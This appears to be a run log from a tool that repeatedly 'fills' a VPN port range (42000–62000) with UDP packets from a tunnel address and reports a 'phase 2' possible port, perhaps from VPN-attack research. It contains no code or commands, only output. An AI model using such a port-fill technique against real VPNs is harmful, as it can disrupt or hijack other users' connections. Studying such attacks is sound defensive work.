+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:20:05 +Starting port fill at 2020-09-06 07:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:21:04 +Starting port fill at 2020-09-06 07:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:22:06 +Starting port fill at 2020-09-06 07:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:23:05 +Starting port fill at 2020-09-06 07:24:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:24:06 +Starting port fill at 2020-09-06 07:25:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:25:05 +Starting port fill at 2020-09-06 07:26:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:26:04 +Starting port fill at 2020-09-06 07:27:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:27:04 +Starting port fill at 2020-09-06 07:28:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:28:04 +Starting port fill at 2020-09-06 07:29:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:29:04 +Starting port fill at 2020-09-06 07:30:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:30:05 +Starting port fill at 2020-09-06 07:31:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:31:07 +Starting port fill at 2020-09-06 07:32:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:32:05 +Starting port fill at 2020-09-06 07:33:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:33:05 +Starting port fill at 2020-09-06 07:34:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:34:07 +Starting port fill at 2020-09-06 07:35:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:35:07 +Starting port fill at 2020-09-06 07:36:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:36:07 +Starting port fill at 2020-09-06 07:37:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:37:06 +Starting port fill at 2020-09-06 07:38:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:38:06 +Starting port fill at 2020-09-06 07:39:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:39:04 +Starting port fill at 2020-09-06 07:40:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:40:04 +Starting port fill at 2020-09-06 07:41:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:41:04 +Starting port fill at 2020-09-06 07:42:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:42:04 +Starting port fill at 2020-09-06 07:43:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:43:04 +Starting port fill at 2020-09-06 07:44:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:44:04 +Starting port fill at 2020-09-06 07:45:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:45:04 +Starting port fill at 2020-09-06 07:46:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 07:46:06 +Starting port fill at 2020-09-06 07:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 07:47:04 +Starting port fill at 2020-09-06 07:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 